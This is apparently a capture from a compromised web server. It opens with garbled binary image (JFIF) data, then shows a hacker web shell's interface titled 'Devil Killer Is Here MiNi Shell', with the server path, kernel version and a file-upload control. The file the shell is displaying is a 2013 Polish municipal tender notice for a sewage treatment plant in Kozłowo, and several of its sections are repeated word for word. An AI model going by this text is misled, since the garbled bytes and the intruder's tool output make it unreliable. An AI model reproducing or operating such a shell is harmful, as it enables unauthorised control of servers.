JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130809/159433-N-2013.html

<p class="kh_header"><b>Kozłowo: Budowa oczyszczalni ścieków w miejscowości Kozłowo</b><br>
<b>Numer ogłoszenia: 159433 - 2013; data zamieszczenia: 09.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kozłowo , Kozłowo 60A, 13-124 Kozłowo, woj. warmińsko-mazurskie, tel. 89 6267505, faks 89 6267502.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa oczyszczalni ścieków w miejscowości Kozłowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie pn. Budowa oczyszczalni ścieków w miejscowości Kozłowo jest współfinansowany ze środków Programu Rozwoju Obszarów Wiejskich na lata 2007-2013. 
1. Przedmiotem zamówienia jest budowa oczyszczalni ścieków w miejscowości Kozłowo o przepustowości docelowej Qdśr=310m3 d w msc. Kozłowo zlokalizowanej na działce nr 219 3 w obrębie Kozłowo. Szczegółowy zakres robót określają: dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót oraz uzupełniająco przedmiary robót (stanowiące załącznik nr 2 do SIWZ). 
2. Przedmiot zamówienia obejmuje również: -sporządzenie szczegółowego harmonogramu rzeczowo - finansowego (uwzględniającego podział prac na dwie części tj. przewidziane do realizacji w 2013 i 2014) roku, planu BIOZ zgodnie z ustawą Prawo Budowlane oraz przepisami szczególnymi i przedłożenie go do zatwierdzenia Zamawiającemu i inspektorowi nadzoru przed przystąpieniem do prac w terminie 10 dni od dnia podpisania umowy, 
- przygotowanie placu budowy oraz zapewnienie obsługi geodezyjnej na potrzeby realizacji zamówienia przez cały okres jej trwania, 
-wykonanie wszelkich niezbędnych badań i prób oraz kompleksowego rozruchu technologicznego w ramach, którego należy uwzględnić wszystkie koszty związane z właściwym prowadzeniem rozruchu technologicznego, tzn.: koszty obsługi oczyszczalni, koszty środków chemicznych używanych w procesach (np. w procesie odwadniania osadu), koszty przeszkolenia dwóch pracowników docelowej obsługi oczyszczalni, koszty wykonywania analiz ścieków i osadu, itp.
-sporządzenie instrukcji obsługi oczyszczalni i instrukcji stanowiskowych,
- osiągniecie planowanego efektu ekologicznego określonego w pozwoleniu wodnoprawnym   wraz z przekazaniem dokumentu potwierdzającego ten wynik- analiza ścieków oczyszczonych uśrednionych dobowych wykonanych w niezależnym laboratorium posiadającym akredytację, 
-wykonanie geodezyjnej inwentaryzacji powykonawczej, 
-sporządzenie i przedłożenie Zamawiającemu kosztorysu powykonawczego (metodą uproszczoną), 
-dostarczenie wszelkich niezbędnych dokumentów pozwalających Zamawiającemu na   uzyskanie pozwolenia na użytkowanie obiektu.

3. Szczegółowy zakres robót określają:
dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót oraz uzupełniająco przedmiary robót. Wykonawca winien uwzględnić w wycenie wszystkie elementy zawarte w dokumentacji projektowej-w przypadku jakichkolwiek rozbieżności pomiędzy dokumentacją a dokumentami pomocniczymi (w tym przedmiary robót)-przesądzają zapisy dokumentacji projektowej.
4. Zamawiający informuje, że dopuszcza składanie ofert, w których poszczególne urządzenia bądź materiały wymienione w dokumentacji projektowej oraz przedmiarze robót mogą być zastąpione urządzeniami bądź materiałami równoważnymi. Za urządzenia bądź materiały równoważne Zamawiający uzna te, które posiadają takie same lub lepsze parametry techniczne i jakościowe niż wskazane w dokumentacji projektowej, a zastosowanie ich w żaden sposób nie wpłynie na prawidłowe funkcjonowanie rozwiązań technicznych przewidzianych w dokumentacji projektowej oraz warunkach zawartych w pozwoleniu na budowę. W przypadku zaoferowania urządzeń bądź materiałów równoważnych, Wykonawca jest zobowiązany do załączenia do oferty wykazu wyspecjalizowanych wszystkich tych urządzeń wraz z podaniem nazwy producenta, dokładnego i jednoznacznego typu urządzenia oraz załączenia stosownych dokumentów takich jak atest PZH, deklaracja zgodności producenta/aprobata techniczna, karta katalogowa producenta zawierająca wszystkie parametry techniczno-eksploatacyjne ujęte w dokumentacji projektowej.
5. W przypadku, jeżeli zmiana urządzeń spowoduje konieczność wykonania nowej dokumentacji projektowej zamiennej- Wykonawca zobowiązany będzie na własny koszt do jej wykonania oraz uzyskania wszelkich dokumentów niezbędnych dla realizacji Inwestycji w oparciu o tę dokumentację.
6. Brak w złożonej ofercie któregokolwiek z wymaganych dokumentów dotyczących urządzeń równoważnych lub zastosowania urządzeń niezgodnych ze wszystkimi parametrami określonymi w projekcie i specyfikacji technicznej będzie powodowało odrzucenie oferty.

2.Wykonanie przedmiotu zamówienia musi być zgodne z warunkami wskazanymi w     decyzjach o pozwoleniu na budowę wydanymi przez Starostę Nidzickiego stanowiących 
   Załącznik nr 5 do SIWZ.

2.1.	Wykonawca zobowiązany  jest udzielić gwarancji jakości na przedmiot zamówienia (tj. roboty budowlane i wbudowane materiały) na okres co najmniej 36 miesięcy, chyba że gwarancja producenta jest dłuższa, wówczas obowiązującą jest gwarancja producenta.
2.2.Wykonawca zobowiązany jest do wykonania zamówienia w sposób rzetelny i terminowy,              zgodnie z dokumentacją projektową,  zasadami sztuki budowlanej przepisami        technicznymi, zasadami bhp i ppoż., obowiązującymi normami technicznymi,        przepisami prawa budowlanego oraz zaleceniami Zamawiającego.
2.3.Wykonawca zobowiązany jest do zabezpieczenia i oznakowania terenu budowy pod       względem bhp i ppoż. oraz do ponoszenia odpowiedzialności wobec Zamawiającego i       osób trzecich za szkody powstałe w trakcie realizacji zamówienia.
2.4.Wykonawca zobowiązany jest do zabezpieczenia terenu budowy przed wejściem osób trzecich oraz czytelnego oznaczenia budowy. W związku z tym, że prace będą realizowane na czynnym obiekcie Wykonawca będzie zobowiązany udostępnić dojazd do istniejącej oczyszczalni w celu korzystania z obecnej infrastruktury oczyszczalni na potrzeby jej eksploatacji do momentu uruchomienia nowo wybudowanego obiektu.
2.5.Wykonawca zrealizuje zamówienie z materiałów i urządzeń własnych, nowych ( rok        produkcji nie starszy niż 2013) przy czym muszą one posiadać wymagane prawem        certyfikaty, atesty i zaświadczenia o dopuszczeniu zastosowanych materiałów do        stosowania w budownictwie  zgodnie z art. 10 ustawy z dnia  07.07.1994r. Prawo       budowlane.
2.6.Wykonawca jest zobowiązany na uzasadnione żądanie Zamawiającego lub powołanego  
      przez niego Inspektora Nadzoru do przedłożenia dowodów zakupu materiałów  
      podstawowych i atestów stwierdzających zgodność użytych materiałów z 
      obowiązującymi normami oraz przedłożenia na zakupione przez siebie materiały kart 
      gwarancyjnych i wszelkich innych dokumentów koniecznych do realizacji uprawnień 
      wobec producenta lub sprzedawcy materiałów.
2.7.Wykonawca zobowiązany jest zapewnić kierownictwo budowy posiadające uprawnienia       budowlane (bez ograniczeń) w specjalnościach: kierownik budowy w specjalności      konstrukcyjno-budowlanej oraz kierowników branży sanitarnej (bez ograniczeń) i 
     elektrycznej (bez ograniczeń) wpisanej na listę członków  właściwej izby samorządu 
     zawodowego, sprawujące ciągły nadzór nad prawidłowością przebiegu prowadzonych 
     robót budowlanych. W przypadku zmiany kierownika budowy lub któregokolwiek z 
     kierowników branżowych Wykonawca zobowiązany jest zastąpić ww. osoby osobami 
     posiadającymi uprawnienia w takim samym zakresie, co osoby zmieniane. 
2.8.Wykonawca zobowiązany jest do pisemnego zgłaszania inspektorowi nadzoru do odbioru      roboty zanikowe lub ulegające zakryciu. Nie zgłoszenie tych robót Inspektorowi  Nadzoru      daje podstawę Zamawiającemu do żądania odkrycia  robót i  przywrócenia stanu      poprzedniego na koszt i ryzyko Wykonawcy. 
2.9.Wykonawcę zobowiązuje się do przerwania robót na żądanie Zamawiającego oraz       zabezpieczenia wykonanych robót.
2.10. Wykonawca zobowiązany jest do uporządkowania terenu budowy po zakończeniu        robót (tj. do usunięcia wszelkich nieczystości stałych lub płynnych powstałych w trakcie       prowadzenia robót budowlanych).
2.11. Wykonawca zobowiązany jest do zgłaszania zamiaru wykonania  robót zamiennych do        Zamawiającego i projektanta. Powyższa zamiana musi uzyskać akceptację         Zamawiającego i projektanta.
 2.12. Wykonawcę zobowiązuje się do udostępnienia dziennika budowy Zamawiającemu         oraz wszystkim osobom przez niego upoważnionym, pracownikom nadzoru        budowlanego lub Państwowej Inspekcji Pracy, zapewnienia dostępu na teren budowy               oraz miejsc gdzie są prowadzone roboty budowlane lub gdzie przewiduje się ich         wykonanie, a są związane z realizacją przedmiotu zamówienia a także przeprowadzania         wizytacji i kontroli na każdym etapie jego realizacji.
2.13. Wykonawca zobowiązany jest do dostosowania się do decyzji Zamawiającego i          powołanego przez niego Inspektora Nadzoru, którzy na każdym etapie realizacji         zamówienia będą mogli przerwać prace na skutek zastosowania materiałów , które nie         będą  zgodne z wymaganiami określonymi rozdziale I art.10 ust.1 ustawy z dnia 7 lipca         1994 r. Prawo budowlane. Rezygnacja powinna nastąpić pisemnie, niezwłocznie po        stwierdzeniu niezgodności. Zastosowane materiały inne niż wyżej wymienione     po stwierdzeniu nieprawidłowości Wykonawca niezwłocznie zdemontuje na koszt własny.
2.14.Wykonawca jest zobowiązany dostarczyć na żądanie Inspektora Nadzoru  Zamawiającego własnym kosztem i staraniem wszelkie pomiary, atesty i niezbędne  badania wykonane przez właściwe i niezależne jednostki badawcze.
 2.15.Wszelkie szkody, jakie powstaną w wyniku prowadzonych prac przez Wykonawcę,          Wykonawca usunie własnym staraniem i na koszt własny..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.27-4, 45.25.22.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść  wadium w wysokości 100 000,00 zł (słownie złotych: sto tysięcy złotych).
Wykonawca może wnieść wadium w gotówce lub kilku innych formach przewidzianych w art. 45 ust. 6 pkt.  ustawy Prawo Zamówień Publicznych. Wadium wnosi się przed upływem terminu składania ofert. Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego z dopiskiem Wadium na Budowę oczyszczalni ścieków w miejscowości Kozłowo:
88 8834 1022 2002 0300 0101 0006
2. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego. Kserokopię wpłaty wadium potwierdzoną za zgodność z oryginałem przez wykonawcę należy dołączyć do oferty.
W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający celem potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie ustawy, żąda załączenia do oferty następujących dokumentów;
       
      - Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1pkt. 2 ustawy, wystawione nie wcześniej niż 6  miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzieleniu zamówienia albo składania ofert.
      - oświadczenie z art. 22 ust 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień          publicznych - załącznik nr 6 do SIWZ ( w przypadku wspólnego ubiegania się o           udzielenie zamówienia przez dwóch  lub więcej wykonawców do oferty muszą być          złożone oświadczenia przez  każdego z  nich)
      - informację o przynależności wykonawcy do grupy kapitałowej na podstawie art. 24 ust.  
         2 pkt. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień  publicznych - załącznik nr 
         12 do SIWZ
      - aktualne zaświadczenie z właściwego urzędu skarbowego potwierdzające, że     wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności 
        lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
       -aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub 
        Kasy Rolniczego Ubezpieczenia Społecznego   potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenia, 
        że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych  
       płatności lub wstrzymanie w całości wykonania decyzji właściwego organu-   wystawionego nie wcześniej  niż 3 miesiące przed upływem   terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo 
         składania ofert
      - oświadczenie o braku podstaw do wykluczenia z przedmiotowego postępowania na           
        podstawie art. 24 ust. 1 w związku z art. 22 ust.1 pkt. 4 ustawy Prawo zamówień          publicznych -  załącznik nr 7 do SIWZ ( w przypadku wspólnego ubiegania się o          udzielenie zamówienia przez dwóch  lub więcej wykonawców do oferty muszą być         złożone oświadczenia przez  każdego z nich)
     
 - aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 
       1 pkt. 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu 
        składania ofert
     - aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 
       1 pkt. 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu 
        składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	Zamawiający celem potwierdzenia posiadania niezbędnej wiedzy i wykształcenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia żąda załączenia do oferty następujących dokumentów
( w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny oraz łączne doświadczenie i kwalifikacje)
-sporządzenia i załączenia do oferty wykazu  wykonanych robót  budowlanych w  okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczeniu do udziału w postępowaniu,  a jeżeli okres prowadzenia działalności jest  krótszy- w  tym okresie wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże że:  zrealizował  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwa zadania  polegające  na budowie, przebudowie lub rozbudowie oczyszczalni ścieków o przepustowości nie mniejszej niż 150 m3/d każda wraz z montażem wyposażenia technologicznego z zastosowaniem technologii osadu czynnego w układzie przepływowym, ciągłym - z osadnikiem wtórnym pionowym, o wartości całkowitej co  najmniej 2 .000.000,00 zł brutto każda (załącznik nr 8 do SIWZ)

-sporządzenia i załączenia do oferty wykazu osób, które będą  uczestniczyć w wykonywaniu  zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z  informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami: w tym-jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, -jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi branży sanitarnej bez ograniczeń,- jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności elektro - energetycznej bez ograniczeń, ( załącznik nr 9 do SIWZ)
           -informacje na temat podwykonawców ( załącznik nr 10 do SIWZ) , wypełnić jeżeli      
            Wykonawca będzie realizował  zamówienie przy pomocy podwykonawców.
            - w przypadku korzystania z potencjału innych podmiotów Wykonawca    przedstawi odpowiednie zobowiązanie tych podmiotów do udostępnienia swego  potencjału na czas realizacji zamówienia (załącznik nr 11 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	Zamawiający celem potwierdzenia posiadania niezbędnej wiedzy i wykształcenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia żąda załączenia do oferty następujących dokumentów
( w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny oraz łączne doświadczenie i kwalifikacje)
-sporządzenia i załączenia do oferty wykazu  wykonanych robót  budowlanych w  okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczeniu do udziału w postępowaniu,  a jeżeli okres prowadzenia działalności jest  krótszy- w  tym okresie wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże że:  zrealizował  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwa zadania  polegające  na budowie, przebudowie lub rozbudowie oczyszczalni ścieków o przepustowości nie mniejszej niż 150 m3/d każda wraz z montażem wyposażenia technologicznego z zastosowaniem technologii osadu czynnego w układzie przepływowym, ciągłym - z osadnikiem wtórnym pionowym, o wartości całkowitej co  najmniej 2 .000.000,00 zł brutto każda (załącznik nr 8 do SIWZ)

-sporządzenia i załączenia do oferty wykazu osób, które będą  uczestniczyć w wykonywaniu  zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z  informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami: w tym-jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, -jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi branży sanitarnej bez ograniczeń,- jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności elektro - energetycznej bez ograniczeń, ( załącznik nr 9 do SIWZ)
           -informacje na temat podwykonawców ( załącznik nr 10 do SIWZ) , wypełnić jeżeli      
            Wykonawca będzie realizował  zamówienie przy pomocy podwykonawców.
            - w przypadku korzystania z potencjału innych podmiotów Wykonawca    przedstawi odpowiednie zobowiązanie tych podmiotów do udostępnienia swego  potencjału na czas realizacji zamówienia (załącznik nr 11 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	Zamawiający celem potwierdzenia posiadania niezbędnej wiedzy i wykształcenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia żąda załączenia do oferty następujących dokumentów
( w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny oraz łączne doświadczenie i kwalifikacje)
-sporządzenia i załączenia do oferty wykazu  wykonanych robót  budowlanych w  okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczeniu do udziału w postępowaniu,  a jeżeli okres prowadzenia działalności jest  krótszy- w  tym okresie wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże że:  zrealizował  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwa zadania  polegające  na budowie, przebudowie lub rozbudowie oczyszczalni ścieków o przepustowości nie mniejszej niż 150 m3/d każda wraz z montażem wyposażenia technologicznego z zastosowaniem technologii osadu czynnego w układzie przepływowym, ciągłym - z osadnikiem wtórnym pionowym, o wartości całkowitej co  najmniej 2 .000.000,00 zł brutto każda (załącznik nr 8 do SIWZ)

-sporządzenia i załączenia do oferty wykazu osób, które będą  uczestniczyć w wykonywaniu  zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z  informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami: w tym-jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, -jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi branży sanitarnej bez ograniczeń,- jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności elektro - energetycznej bez ograniczeń, ( załącznik nr 9 do SIWZ)
           -informacje na temat podwykonawców ( załącznik nr 10 do SIWZ) , wypełnić jeżeli      
            Wykonawca będzie realizował  zamówienie przy pomocy podwykonawców.
            - w przypadku korzystania z potencjału innych podmiotów Wykonawca    przedstawi odpowiednie zobowiązanie tych podmiotów do udostępnienia swego  potencjału na czas realizacji zamówienia (załącznik nr 11 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
